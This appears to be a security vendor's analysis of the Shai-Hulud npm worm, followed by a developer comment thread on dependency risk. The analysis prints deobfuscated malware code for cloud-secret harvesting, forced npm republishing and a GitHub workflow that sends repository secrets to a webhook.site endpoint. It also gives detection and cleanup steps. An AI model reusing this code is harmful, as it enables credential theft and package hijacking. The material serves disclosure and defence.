The NPM ecosystem is facing another critical supply chain attack. The popular @ctrl/tinycolor package, which receives over 2 million weekly downloads, has been compromised along with more than 40 other packages across multiple maintainers. This attack demonstrates a concerning evolution in supply chain threats - the malware includes a self-propagating mechanism that automatically infects downstream packages, creating a cascading compromise across the ecosystem. The compromised versions have been removed from npm.
The incident was discovered by @franky47, who promptly notified the community through a GitHub issue.
In this post, we'll dive deep into the payload's mechanics, including deobfuscated code snippets, API call traces, and diagrams to illustrate the attack chain. Our analysis reveals a Webpack-bundled script (bundle.js) that leverages Node.js modules for reconnaissance, harvesting, and propagation, targeting Linux/macOS developers with access to NPM, GitHub, and cloud credentials.
The attack unfolds through a sophisticated multi-stage chain that leverages Node.js's process.env for opportunistic credential access and employs Webpack-bundled modules for modularity. At the core of this attack is a ~3.6MB minified bundle.js file, which executes asynchronously during npm install. This execution is likely triggered via a hijacked postinstall script embedded in the compromised package.json.
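For illustration, a hijacked postinstall hook of this kind could look like the following hypothetical package.json fragment (the compromised packages may wire the payload up differently):

{
  "scripts": {
    "postinstall": "node bundle.js"
  }
}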
Self-Propagation Engine
The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages. This creates a cascading compromise effect, recursively injecting the malicious bundle into dependent ecosystems across the NPM registry.
Credential Harvesting
The malware repurposes open-source tools like TruffleHog to scan the filesystem for high-entropy secrets. It searches for patterns such as AWS keys using regular expressions like AKIA[0-9A-Z]{16}. Additionally, the malware dumps the entire process.env, capturing transient tokens such as GITHUB_TOKEN and AWS_ACCESS_KEY_ID.
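As an illustration, matching that pattern against the environment takes only a few lines of Node.js (a simplified sketch, not the malware's actual code):

// Simplified sketch: flag environment variables whose values look like AWS access key IDs
const AWS_KEY_PATTERN = /AKIA[0-9A-Z]{16}/;

function findSuspectedAwsKeys(env = process.env) {
  const hits = [];
  for (const [name, value] of Object.entries(env)) {
    if (typeof value === 'string' && AWS_KEY_PATTERN.test(value)) {
      hits.push(name); // record which variable matched
    }
  }
  return hits;
}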
For cloud-specific operations, the malware enumerates AWS Secrets Manager using SDK pagination and accesses Google Cloud Platform secrets via the @google-cloud/secret-manager API. In short, it targets NPM tokens, GitHub tokens, and AWS and GCP credentials wherever they are reachable.
Persistence Mechanism
The malware establishes persistence by injecting a GitHub Actions workflow file (.github/workflows/shai-hulud-workflow.yml) via a base64-encoded bash script. This workflow triggers on push events and exfiltrates repository secrets using the expression ${{ toJSON(secrets) }} to a command and control endpoint. The malware creates a new branch (refs/heads/shai-hulud) from the default branch's HEAD using GitHub's /git/refs endpoint.
Data Exfiltration
The malware aggregates harvested credentials into a JSON payload, which is pretty-printed for readability. It then uploads this data to a new public repository named Shai-Hulud via the GitHub /user/repos API.
The entire attack design assumes Linux or macOS execution environments, checking os.platform() for 'linux' or 'darwin' and deliberately skipping Windows systems. For a visual breakdown, see the attack flow diagram below:
The compromise begins with a minified JavaScript bundle injected into affected packages like @ctrl/tinycolor. This is not rudimentary malware but a sophisticated modular engine that uses Webpack chunks to organize OS utilities, cloud SDKs, and API wrappers.
The payload imports six core modules, each serving a specific function in the attack chain.
This module calls getSystemInfo() to build a comprehensive system profile containing platform, architecture, platformRaw, and archRaw information. It dumps the entire process.env, capturing sensitive environment variables including AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and other credentials that may be present in the environment.
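A simplified sketch of this kind of reconnaissance (illustrative; the mapping of platformRaw/archRaw to specific os calls is an assumption, not taken from the deobfuscated source):

// Illustrative reconnaissance sketch: build a host profile and dump the environment
const os = require('os');

function getSystemInfo() {
  return {
    platform: os.platform(),   // e.g. 'linux' or 'darwin'
    arch: os.arch(),           // e.g. 'x64' or 'arm64'
    platformRaw: os.type(),    // assumed mapping: raw kernel name such as 'Linux' / 'Darwin'
    archRaw: process.arch,     // assumed mapping
    env: { ...process.env },   // full environment dump, including any tokens present
  };
}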
The AWS harvesting module validates credentials using the STS AssumeRoleWithWebIdentityCommand. It then enumerates secrets using the @aws-sdk/client-secrets-manager library.
// Deobfuscated AWS harvest snippet
async getAllSecretValues() {
  const secrets = [];
  let nextToken;
  do {
    const resp = await client.send(new ListSecretsCommand({ NextToken: nextToken }));
    for (const secret of resp.SecretList || []) {
      const value = await client.send(new GetSecretValueCommand({ SecretId: secret.ARN }));
      secrets.push({ ARN: secret.ARN, SecretString: value.SecretString, SecretBinary: atob(value.SecretBinary) }); // Base64 decode binaries
    }
    nextToken = resp.NextToken;
  } while (nextToken);
  return secrets;
}
The module handles errors such as DecryptionFailure or ResourceNotFoundException silently through decorateServiceException wrappers. It targets all AWS regions via endpoint resolution.
The GCP module uses @google-cloud/secret-manager to list secrets matching the pattern projects/*/secrets/*. It implements pagination using nextPageToken and returns objects containing the secret name and decoded payload. The module fails silently on PERMISSION_DENIED errors without alerting the user.
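A simplified sketch of that enumeration using the @google-cloud/secret-manager client (illustrative; projectId is a placeholder):

// Illustrative GCP secret enumeration sketch
const { SecretManagerServiceClient } = require('@google-cloud/secret-manager');

async function harvestGcpSecrets(projectId) {
  const client = new SecretManagerServiceClient();
  const results = [];
  // listSecrets pages through projects/<id>/secrets/* on our behalf
  const [secrets] = await client.listSecrets({ parent: `projects/${projectId}` });
  for (const secret of secrets) {
    try {
      const [version] = await client.accessSecretVersion({ name: `${secret.name}/versions/latest` });
      results.push({ name: secret.name, payload: version.payload.data.toString('utf8') });
    } catch {
      // PERMISSION_DENIED and missing versions are swallowed silently
    }
  }
  return results;
}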
This module spawns TruffleHog via child_process.exec('trufflehog filesystem / --json') to scan the entire filesystem. It parses the output for high-entropy matches, such as AWS keys found in ~/.aws/credentials.
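A simplified sketch of such a wrapper around the TruffleHog CLI (illustrative; assumes trufflehog is on the PATH and emits one JSON finding per line):

// Illustrative TruffleHog wrapper: run a filesystem scan and collect JSON findings
const { exec } = require('child_process');

function runTrufflehogScan(root = '/') {
  return new Promise((resolve) => {
    exec(`trufflehog filesystem ${root} --json`, { maxBuffer: 1024 * 1024 * 64 }, (err, stdout) => {
      const findings = (stdout || '')
        .split('\n')
        .filter(Boolean)
        .map((line) => { try { return JSON.parse(line); } catch { return null; } })
        .filter(Boolean);
      resolve(findings); // errors are ignored, mirroring the malware's silent behavior
    });
  });
}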
The NPM propagation module parses NPM_TOKEN from either ~/.npmrc or environment variables. After validating the token via the /whoami endpoint, it queries /v1/search?text=maintainer:${username}&size=20 to retrieve packages owned by the maintainer.
// Deobfuscated NPM update snippet
async updatePackage(pkg) {
  // Patch package.json (add self as dep?) and publish
  await exec(`npm version patch --force && npm publish --access public --token ${token}`);
}
This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user.
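A minimal sketch of that enumeration step, assuming the public registry's /-/whoami and /-/v1/search endpoints; the malware's actual calls may differ:

// Illustrative sketch: resolve the token's owner, then list up to 20 of their packages
async function listMaintainerPackages(token) {
  const headers = { Authorization: `Bearer ${token}` };
  const who = await fetch('https://registry.npmjs.org/-/whoami', { headers }).then((r) => r.json());
  const search = await fetch(
    `https://registry.npmjs.org/-/v1/search?text=maintainer:${who.username}&size=20`,
    { headers }
  ).then((r) => r.json());
  return search.objects.map((o) => o.package.name); // candidate packages for force-publishing
}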
The GitHub backdoor module authenticates via the /user endpoint, requiring repo and workflow scopes. After listing organizations, it injects malicious code via a bash script (Module 941).
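A minimal sketch of that validation step, assuming a classic token whose granted scopes are reported in the X-OAuth-Scopes response header:

// Illustrative sketch: validate a GitHub token and check for repo/workflow scopes
async function validateGithubToken(token) {
  const resp = await fetch('https://api.github.com/user', {
    headers: { Authorization: `token ${token}`, 'User-Agent': 'analysis-sketch' },
  });
  if (!resp.ok) return null;
  const scopes = (resp.headers.get('x-oauth-scopes') || '').split(',').map((s) => s.trim());
  const usable = scopes.includes('repo') && scopes.includes('workflow');
  return { user: await resp.json(), scopes, usable };
}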
Here is the line-by-line bash script deconstruction:
# Deobfuscated Code snippet
#!/bin/bash
GITHUB_TOKEN="$1"
BRANCH_NAME="shai-hulud"
FILE_NAME=".github/workflows/shai-hulud-workflow.yml"
FILE_CONTENT=$(cat <<'EOF'
on: push  # Trigger on any push
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -d "$CONTENTS" https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7  # C2 exfil
          echo "$CONTENTS" | base64 -w 0 | base64 -w 0  # Double-base64 for evasion
        env:
          CONTENTS: ${{ toJSON(secrets) }}  # Dumps all repo secrets (GITHUB_TOKEN, AWS keys, etc.)
EOF
)

github_api() { curl -s -X "$1" -H "Authorization: token $GITHUB_TOKEN" ... "$API_BASE$2" }

REPOS_RESPONSE=$(github_api GET "/user/repos?affiliation=owner,collaborator,organization_member&since=2025-01-01T00:00:00Z&per_page=100")

while IFS= read -r repo; do
  # Get default branch SHA
  REF_RESPONSE=$(github_api GET "/repos/$REPO_FULL_NAME/git/ref/heads/$DEFAULT_BRANCH")
  BASE_SHA=$(jq -r '.object.sha' <<< "$REF_RESPONSE")
  BRANCH_DATA=$(jq -n '{ref: "refs/heads/shai-hulud", sha: "$BASE_SHA"}')
  github_api POST "/repos/$REPO_FULL_NAME/git/refs" "$BRANCH_DATA"  # Handles "already exists" gracefully
  FILE_DATA=$(jq -n '{message: "Add workflow", content: "$(base64 <<< "$FILE_CONTENT")", branch: "shai-hulud"}')
  github_api PUT "/repos/$REPO_FULL_NAME/contents/$FILE_NAME" "$FILE_DATA"  # Overwrites if exists
done
This mechanism ensures persistence, as secrets are exfiltrated to the command and control server on the next push event.
The malware builds a comprehensive JSON payload containing system information, environment variables, and data from all modules. It then creates a public repository via a POST to the GitHub /user/repos endpoint using the function makeRepo('Shai-Hulud'). The repository is public by default to ensure easy access for the command and control infrastructure.
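A minimal sketch of that repository-creation call (makeRepo is the malware's function name; the fetch call below is an assumption about how it maps onto the API):

// Illustrative sketch: create a public "Shai-Hulud" repo to receive the exfiltrated JSON
async function makeRepo(name, token) {
  const resp = await fetch('https://api.github.com/user/repos', {
    method: 'POST',
    headers: {
      Authorization: `token ${token}`,
      'Content-Type': 'application/json',
      'User-Agent': 'analysis-sketch',
    },
    body: JSON.stringify({ name, private: false }), // public by default
  });
  return resp.json(); // contains full_name, html_url, etc. of the new repository
}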
The attack employs several evasion techniques including silent error handling (swallowed via catch {} blocks), no logging output, and disguising TruffleHog execution as a legitimate "security scan."
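The swallowed-error pattern looks roughly like this (illustrative):

// Illustrative evasion pattern: every harvesting step is wrapped so failures never surface
async function quietly(step) {
  try {
    return await step();
  } catch {
    // no logging, no rethrow: errors are swallowed to avoid alerting the user
    return null;
  }
}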
The following indicators can help identify systems affected by this attack:
Use these GitHub search queries to identify potentially compromised repositories across your organization:
Replace ACME with your GitHub organization name and use the following GitHub search query to discover all instances of shai-hulud-workflow.yml in your GitHub environment.
https://github.com/search?q=org%3AACME+path%3A**%2Fshai-hulud-workflow.yml&type=code
To find malicious branches, you can use the following Bash script:
# List all repos and check for shai-hulud branch
gh repo list YOUR_ORG_NAME --limit 1000 --json nameWithOwner --jq '.[].nameWithOwner' | while read repo; do
  gh api "repos/$repo/branches" --jq '.[] | select(.name == "shai-hulud") | "'$repo' has branch: " + .name'
done
SHA-256 hash of the malicious bundle.js: 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
Command and control endpoint: https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7
Backdoor workflow file: .github/workflows/shai-hulud-workflow.yml
Presence of the NpmModule.updatePackage function
Calls to secretsmanager.*.amazonaws.com endpoints, particularly BatchGetSecretValueCommand
Calls to secretmanager.googleapis.com
Queries to registry.npmjs.org/v1/search
Calls to api.github.com/repos
TruffleHog invocations with the filesystem / arguments
Use of the --force flag during npm version/publish operations
The following packages have been confirmed as compromised:
Package Name | Version(s) |
---|---|
@ctrl/tinycolor | 4.1.1, 4.1.2 |
angulartics2 | 14.1.2 |
@ctrl/deluge | 7.2.2 |
@ctrl/golang-template | 1.4.3 |
@ctrl/magnet-link | 4.0.4 |
@ctrl/ngx-codemirror | 7.0.2 |
@ctrl/ngx-csv | 6.0.2 |
@ctrl/ngx-emoji-mart | 9.2.2 |
@ctrl/ngx-rightclick | 4.0.2 |
@ctrl/qbittorrent | 9.7.2 |
@ctrl/react-adsense | 2.0.2 |
@ctrl/shared-torrent | 6.3.2 |
@ctrl/torrent-file | 4.1.2 |
@ctrl/transmission | 7.3.1 |
@ctrl/ts-base32 | 4.0.2 |
encounter-playground | 0.0.5 |
json-rules-engine-simplified | 0.2.4, 0.2.1 |
koa2-swagger-ui | 5.11.2, 5.11.1 |
@nativescript-community/gesturehandler | 2.0.35 |
@nativescript-community/sentry | 4.6.43 |
@nativescript-community/text | 1.6.13 |
@nativescript-community/ui-collectionview | 6.0.6 |
@nativescript-community/ui-drawer | 0.1.30 |
@nativescript-community/ui-image | 4.5.6 |
@nativescript-community/ui-material-bottomsheet | 7.2.72 |
@nativescript-community/ui-material-core | 7.2.76 |
@nativescript-community/ui-material-core-tabs | 7.2.76 |
ngx-color | 10.0.2 |
ngx-toastr | 19.0.2 |
ngx-trend | 8.0.1 |
react-complaint-image | 0.0.35 |
react-jsonschema-form-conditionals | 0.3.21 |
react-jsonschema-form-extras | 1.0.4 |
rxnt-authentication | 0.0.6 |
rxnt-healthchecks-nestjs | 1.0.5 |
rxnt-kue | 1.0.7 |
swc-plugin-component-annotate | 1.9.2 |
ts-gaussian | 3.0.6 |
If you use any of the affected packages, take these actions immediately:
# Check for affected packages in your project
npm ls @ctrl/tinycolor

# Remove compromised packages
npm uninstall @ctrl/tinycolor

# Search for the known malicious bundle.js by hash
find . -type f -name "*.js" -exec sha256sum {} \; | grep "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09"

# Check for and remove the backdoor workflow
rm -f .github/workflows/shai-hulud-workflow.yml

# Look for suspicious 'shai-hulud' branches in all repositories
git ls-remote --heads origin | grep shai-hulud

# Delete any malicious branches found
git push origin --delete shai-hulud
The malware harvests credentials from multiple sources. Rotate ALL of the following: NPM tokens, GitHub personal access tokens, AWS access keys, GCP service account credentials, any secrets stored in AWS Secrets Manager or GCP Secret Manager, and any CI/CD or repository secrets exposed through environment variables.
Since the malware specifically targets AWS Secrets Manager and GCP Secret Manager, you need to audit your cloud infrastructure for unauthorized access. The malware uses API calls to enumerate and exfiltrate secrets, so reviewing audit logs is critical to understanding the scope of compromise.
Start by examining your CloudTrail logs for any suspicious secret access patterns. Look specifically for BatchGetSecretValue, ListSecrets, and GetSecretValue API calls that occurred during the time window when the compromised package may have been installed. Also generate and review IAM credential reports to identify any unusual authentication patterns or newly created access keys.
# Check CloudTrail for suspicious secret access
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=BatchGetSecretValue
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue

# Review IAM credential reports for unusual activity
aws iam get-credential-report --query 'Content'
For Google Cloud Platform, review your audit logs for any access to the Secret Manager service. The malware uses the @google-cloud/secret-manager library to enumerate secrets, so look for unusual patterns of secret access. Additionally, check for any unauthorized service account key creation, as these could be used for persistent access.
# Review secret manager access logs
gcloud logging read "resource.type=secretmanager.googleapis.com" --limit=50 --format=json
# Check for unauthorized service account key creation
gcloud logging read "protoPayload.methodName=google.iam.admin.v1.CreateServiceAccountKey"
Block traffic to webhook.site domains immediately, in particular the command and control endpoint https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7.
The following steps are applicable only for StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14 day free trial by installing the StepSecurity GitHub App to complete the following recovery step.
The NPM Cooldown check automatically fails a pull request if it introduces an npm package version that was released within the organization’s configured cooldown period (default: 2 days). Once the cooldown period has passed, the check will clear automatically with no action required. The rationale is simple - most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
Here is an example showing how this check protected a project from using the compromised versions of packages involved in this incident:
As a user of npm-hosted packages in my own projects, I'm not really sure what to do to protect myself. It's not feasible for me to audit every single one of my dependencies, and every one of my dependencies' dependencies, and so on. Even if I had the time to do that, I'm not a typescript/javascript expert, and I'm certain there are a lot of obfuscated things that an attacker could do that I wouldn't realize was embedded malware.
One thing I was thinking of was sort of a "delayed" mode to updating my own dependencies. The idea is that when I want to update my dependencies, instead of updating to the absolute latest version available of everything, it updates to versions that were released no more than some configurable amount of time ago. As a maintainer, I could decide that a package that's been out in the wild for at least 6 weeks is less likely to have unnoticed malware in it than one that was released just yesterday.
Obviously this is not a perfect fix, as there's no guarantee that the delay time I specify is enough for any particular package. And I'd want the tool to present me with options sometimes: e.g. if my current version of a dep has a vulnerability, and the fix for it came out a few days ago, I might choose to update to it (better eliminate the known vulnerability than refuse to update for fear of an unknown one) rather than wait until it's older than my threshold.
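A rough sketch of that idea, using the registry's per-version publish timestamps (the packument's time field): pick the newest version that is at least N days old.

// Illustrative "cooldown" resolver: newest version published at least minAgeDays ago
async function pickCooledDownVersion(pkgName, minAgeDays = 42) {
  const meta = await fetch(`https://registry.npmjs.org/${pkgName}`).then((r) => r.json());
  const cutoff = Date.now() - minAgeDays * 24 * 60 * 60 * 1000;
  // meta.time maps each published version to its publish timestamp
  const old = Object.entries(meta.time)
    .filter(([v]) => v !== 'created' && v !== 'modified')
    .filter(([, published]) => Date.parse(published) <= cutoff)
    .sort((a, b) => Date.parse(a[1]) - Date.parse(b[1]));
  return old.length ? old[old.length - 1][0] : null; // most recent version older than the cutoff
}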
> It's not feasible for me to audit every single one of my dependencies, and every one of my dependencies' dependencies
I think this is a good argument for reducing your dependency count as much as possible, and keeping them to well-known and trustworthy (security-wise) creators.
"Not-invented-here" syndrome is counterproductive if you can trust all authors, but in an uncontrolled or unaudited ecosystem it's actually pretty sensible.
Have we all forgotten the left-pad incident?
This is an ecosystem that has taken code reuse to the (unreasonable) extreme.
When JS was becoming popular, I’m pretty sure every dev cocked an eyebrow at the dependency system and wondered how it’d be attacked.
> This is an ecosystem that has taken code reuse to the (unreasonable) extreme.
Not even that, actually. The wheel is reinvented over and over again in this exact ecosystem. Many packages are low quality and not even suitable for much reuse.
It's the perfect storm: on one side, junior developers who are afraid of writing even trivial code and are glad if there's a package implementing functionality that could be a one-liner; on the other side, (often junior) developers who want to prove themselves and think the best way to do that is to publish a successful npm package.
The blessing and curse of frontend development is that there basically isn't a barrier to entry given that you can make some basic CSS/JS/HTML and have your browser render it immediately.
There's also the flavor of frontend developer that came from the backend and sneers at actually having to learn frontend because "it's not real development"
Ha, that's a funny attitude. And here I was thinking that, mostly doing backend work, I'd rather make the best of the situation when I have to do frontend dev and try to do "real development" by writing trivial things myself, instead of making things worse by gluing together mountains of bloat.
> There's also the flavor of frontend developer that came from the backend and sneers at actually having to learn frontend because "it's not real development"
What kind of code does this developer write?
As little code as possible to get the job done without enormous dependencies. Avoiding js and using css and html as much as possible.
The designer, the customer, and US/EU accessibility laws heavily disagree.
The designer already disagrees with accessibility laws. Contrast is near zero.
The designer might only disagree if they know a lot about frontend technology and are not merely clicking together a Figma castle.
But the middle management might actually praise the developer, because they "get the job done" with the minimal effort (so "efficient"!).
How is javascript required for accessibility? I wasn’t aware of that.
It is not. In fact, it is all the modern design sensibilities and front-end frameworks that make it nearly impossible to make accessible things.
We once had the rule HTML should be purely semantic and all styling should be in CSS. It was brilliant, even though not everything looked as fancy as today.
JS is in fact required for AA level compliance in some cases, usually to retain/move focus appropriately, or to provide expected keyboard controls.
https://www.w3.org/WAI/WCAG22/Techniques/#client-side-script
Also, when was that semantic HTML rule? You make it sound like ancient history, but semantic HTML has only been a thing since HTML5 (2008).
You only need to use scripts to move focus and provide keyboard controls if you have done something to mess with the focus and break the standard browser keyboard controls.
If you're using HTML/CSS sensibly then it's accessible from the get-go by dint of the browser being accessible.
> Also, when was that semantic HTML rule? You make it sound like ancient history, but semantic HTML has only been a thing since HTML5 (2008).
HTML5 added a million new tags, but HTML4 had plenty of semantic tags that people regularly ignored and replaced with <div>, for example <p>, <em>, <blockquote>...
In some cases, sure.
I'm not saying the ideal frontend dev writes no JS. I'm saying they write as little as possible. Some times you need JS, nothing wrong with that. The vast majority of the time you don't. And if you do I'd say it's a self-imposed requirement (or a direct/indirect result of a self imposed requirement) most of the time.
Some of those are fixes for misbehaving javascript like disabling nonessential alerts, stopping blinking, reducing animation; some are antipatterns like opening new windows, changing link text, colors, scrolling.
The web standards project was founded in 1998.
As the customer, I think that's the perfect frontend dev. Fuck the JS monstrosities that people build, they are so much harder to use than plain HTML.
A11y is mostly handled by just using semantic html.
The designer, in my experience, is totally fine with just using a normal select element, they don't demand that I reinvent the drop-down with divs just to put rounded corners on the options.
Nobody cares about that stuff. These are minor details, we can change it later if someone really wants it. As long as we're not just sitting on our hands for lack of work I'm not putting effort into reinventing things the browser has already solved.
I hope in the future I can work with that kind of designer. Maybe it is just my limited experience, but in that limited experience web designers care way too much about details and design features/ideas/concepts that are not part of HTML or CSS, and then frontend developers have to push back and tell the web designer that form follows function and that the medium they design for matters. These are basic design principles that designers should know themselves, just as they should know the medium they are targeting (semantic HTML, CSS, the capabilities of both, a tiny bit about JS too) to keep things reasonable. But most frontend devs are happy to build fancy things with JS instead of pushing back when it matters, and not many frontend devs want to get deep into CSS and do everything they can to avoid JS. So needless things get implemented all the time.
The word “mostly” is the crux of the issue.
The designer wants huge amounts of screen space wasted on unnecessary padding, massive Fisher-Price rounded corners, and fancy fading and sliding animations that get in the way and slow things down. (Moreover, the designer just happens to want to completely re-design everything a few months later.)
The customer “ooh”s and “aah”s at said fancy animations running on the salesman’s top of the line macbook pro and is lured in, only realising too late that they’ve been bitten in the ass by the enormous amount of bloat that makes it run like a potato on any computer that costs less than four thousand dollars.
And US/EU laws are written by clueless bureaucrats whose most recent experience with technology is not even an electric typewriter.
What’s your point?
I think their point is that you might not have much of a choice, taking laws and modern aesthetic and economic concerns into consideration.
We "in the know" might agree, but we're not going to get it sold.
I think blind people should be able to use websites.
Wow, those are some jaded and cynical views.
In my experience, generally speaking, there is a kind of developer who tries to write the language they're familiar with, but in JavaScript. As the pithy saying goes, it takes a lot of skill to write Java in every language.
Usually they write only prompts and then accept whatever is generated, ignoring all typing and linting issues
Prompts? React and Angular came out over 10 years ago. The left pad incident happened in 2016.
Let me assure you, devs were skeptical about all this well before AI.
People pushing random throwaway packages is not the issue.
A lot of the culture is built by certain people who make a living out of package maximalism.
More packages == more eyeballs == more donations.
They have an agenda that small packages are good and made PRs into popular packages to inject their junk into the supply chain.
Not on HN, the land of "you should use a SaaS or PaaS for that (because I might eventually work there and make money)" or "I don't want to maintain that code because it's not strictly related to my CRUD app business! how you dare!"
1.2 million weekly downloads to this day, when we've had builtin padStart since ES2017.
Yes, I remember thinking at the time "how are people not ashamed to install this?"
I found it funny back when people were abandoning Java for JavaScript thinking that was better somehow...(especially in terms of security)
NPM is good for building your own stack but it's a bad idea (usually) to download the Internet. No dep system is 100% safe (including AI, generating new security vulns yay).
I'd like to think that we'll all stop grabbing code we don't understand and thrusting it into places we don't belong, or at least, do it more slowly, however, I also don't have much faith in the average (especially frontend web) dev. They are often the same idiots doing XYZ in the street.
I predict more hilarious (scary even) kerfuffles, probably even major militaries losing control of things ala Terminator style.
It’s not clear to me what this has to do with Java vs JavaScript (unless you’re referring to the lack of a JS standard library which I think will pretty much minimize this issue).
In fact, when we did have Java in the browser it was loaded with security issues primarily because of the much greater complexity of the Java language.
Java has maven, and is far from immune from similar types of attacks. However, it doesn't have the technological monstrosity named NPM. In fact that aforementioned complexity is/was an asset in raising the bar, however slightly, in producing java packages. Crucially, that ecosystem is nowhere near as absurdly complex (note, I'm ignoring the ill-fated cousin that is Gradle, which is also notorious for being a steaming pile of barely-working inscrutable dependencies).
Anyways, I think you are missing the forest for the trees if you think this is a Java vs JavaScript comparison, don't worry it's also possible to produce junk enterprise code too...
Just amusing watching people be irrationally scared of one language/ecosystem vs another without stopping to think why or where the problems are coming from.
It's not the language it's the library that's not designed to isolate untrusted code from the start. Much harder to exit the sandbox if your only I/O mechanism is the DOM, alert() and prompt().
And the whole rest of the Internet...
The issue here is not Java or its complexity. The point is also not Java; it's incidental that it was popular at the time. It's people acting irrationally about things and jumping ship for an even-worse system.
Like, yes, if that really were the whole attack surface of JS, sure nobody would care. They also wouldn't use it...and nothing we cared about would use it either...
The security issues with Java applets usually led to local unsandboxed code execution. It's a lot harder to do that with JS because just running Java and confusing the security manager gets you full Java library access, vs JS with no built in I/O.
In that era JavaScript was also loaded with security issues. That's why browsers had to invest so much in kernel sandboxing. Securing JavaScript VMs written by hand in C++ is a dead end, although ironically given this post, it's easier when they're written in Java [1]
But the reason Java is more secure than JavaScript in the context of supply chain attacks is fourfold:
1. Maven packages don't have install scripts. "Installing" a package from a Maven repository just means downloading it to a local cache, and that's it.
2. Java code is loaded lazily on demand, class at a time. Even adding classes to a JAR doesn't guarantee they'll run.
3. Java uses fewer, larger, more curated libraries in which upgrades are a more manual affair involving reading the release notes and the like. This does have its downsides: apps can ship with old libraries that have unfixed bugs. Corporate users tend to have scanners looking for such problems. But it also has an upside, in that pushing bad code doesn't immediately affect anything and there's plenty of time for the author to notice.
4. Corporate Java users often run internal mirrors of Maven rather than having every developer fetch from upstream.
The gap isn't huge: Java frameworks sometimes come with build system plugins that could inject malware as they compile the code, and of course if you can modify a JAR you can always inject code into a class that's very likely to be used on any reasonable codepath.
But for all the ragging people like to do on Java security, it was ahead of its time. A reasonable fix for these kind of supply chain attacks looks a lot like the SecurityManager! The SecurityManager didn't get enough adoption to justify its maintenance costs and was removed, partly because of those factors above that mean supply chain attacks haven't had a significant impact on the JVM ecosystem yet, and partly due to its complexity.
It's not clear yet what securing the supply chain in the Java world will look like. In-process sandboxing might come back or it might be better to adopt a Chrome-style microservice architecture; GraalVM has got a coarser-grained form of sandboxing that supports both in-process and out-of-process isolation already. I wrote about the tradeoffs involved in different approaches here:
https://blog.plan99.net/why-not-capability-languages-a8e6cbd...
[1] https://medium.com/graalvm/writing-truly-memory-safe-jit-com...
If it's not feasible to audit every single dependency, it's probably even less feasible to rewrite every single dependency from scratch. Avoiding that duplicated work is precisely why we import dependencies in the first place.
Most dependencies do much more than we need from them. Often it means we only need one or a few functions from them. This means one doesn't need to rewrite whole dependencies usually. Don't use dependencies for things you can trivially write yourself, and use them for cases where it would be too much work to write yourself.
A brief but important point is that this primarily holds true in the context of rewriting/vendoring utilities yourself, not when discussing importing small vs. large dependencies.
Just because dependencies do a lot more than you need, doesn't mean you should automatically reach for the smallest dependency that fits your needs.
If you need 5 of the dozens of Lodash functions, for instance, it might be best to just install Lodash and let your build step shake out any unused code, rather than importing 5 new dependencies, each with far fewer eyes and release-management best practices than the Lodash maintainers have.
The argument wasn’t to import five dependencies, one for each of the functions, but to write the five functions yourself. Heck, you don’t even need to literally write them, check the Lodash source and copy them to your code.
This might be fine for some utility functions which you can tell at a glance have no errors, but for anything complex, if you copy you don't get any of the bug/security fixes that upstream will provide automatically. Oh, now you need a shim of this call to work on the latest Chrome because they killed an api- you're on your own or you have to read all of the release notes for a dependency you don't even have! But taking a dependency on some other library is, as you note, always fraught. Especially because of transitive dependencies, you end up having quite a target surface area for every dep you take.
Whether to take a dependency is a tricky thing that really comes down to engineering judgement- the thing that you (the developer) are paid to make the calls on.
The massive amount of transitive dependencies is exactly the problem with regard to auditing them. There are successful businesses built solely around auditing project dependencies and alerting teams of security issues, and they make money at all because of the labor required to maintain this machine.
It’s not even a judgement call at this point. It’s more aligned with buckling your seatbelt, pointing your car off the road, closing your eyes, flooring it and hoping for a happy ending.
And then when node is updated and natively supports set intersections you would go back to your copied code and fix it?
If it works, why do so? Unless there's a clear performance boost, and if so you already know the code and can quickly locate your interpreted version.
Or, at the time of adding, you can add a NOTE or FIXME comment stating where you copied it from. A quick grep for such a keyword can give you a nice overview of nice-to-have stuff. You can also add a ticket with all the details if you're using a project management tool and resuscitate it when that hypothetical moment happens.
If you won't, do you expect the maintainer of some micro package to do that?
You have obviously never checked the Lodash source.
The point here isn’t a specific library. It’s not even one specific language or runtime. No one is talking about literally five functions. Let’s not be pedantic and lose sight of the major point.
I get that, but if you’ve ever tried to extract a single utility function from lodash, you know that it may not be as simple as copy-pasting a single function.
If you are going to be that specific, then it would be good to post an example. If I remember correctly, lodash has some functions, that would be table stakes in functional languages, or easily built in functional languages. If such a function is difficult to extract, then it might be a good candidate to write in JS itself, which does have some of the typical tools, like map, reduce, and things like compose are easy to write oneself and part of every FP beginner tutorial. If such a function is difficult to extract, then perhaps lodash's design is not all that great. Maybe one could also copy them from elsewhere, where the code is more modular.
But again, if the discussion is going to be that specific, then you would need to provide actual examples, so that we could judge, whether we would implement that ourselves or it would be difficult to do so. Note, that often it is also not required for ones use-case, to have a 100% matching behavior either. The goal is not to duplicate lodash. The purpose of the extracted or reimplemented function would still be ones own project, where the job of that function might be much more limited.
Let’s start with something simple, like difference().
https://github.com/lodash/lodash/blob/main/dist/lodash.js#L7...
So you also need to copy isArrayLikeObject, baseDifference and baseFlatten.
For baseDifference, you also need to copy arrayMap and baseUnary.
For baseFlatten, you also need to copy arrayPush.
For isArrayLikeObject, you also need to copy isArrayLike and isObjectLike.
For isArrayLike, you also need to copy isLength and isFunction.
For isFunction, you also need to copy isObject and baseGetTag.
For baseGetTag, you also need to copy getRawTag and objectToString.
I don’t have time to dig any deeper, just use tree-shaking ffs.
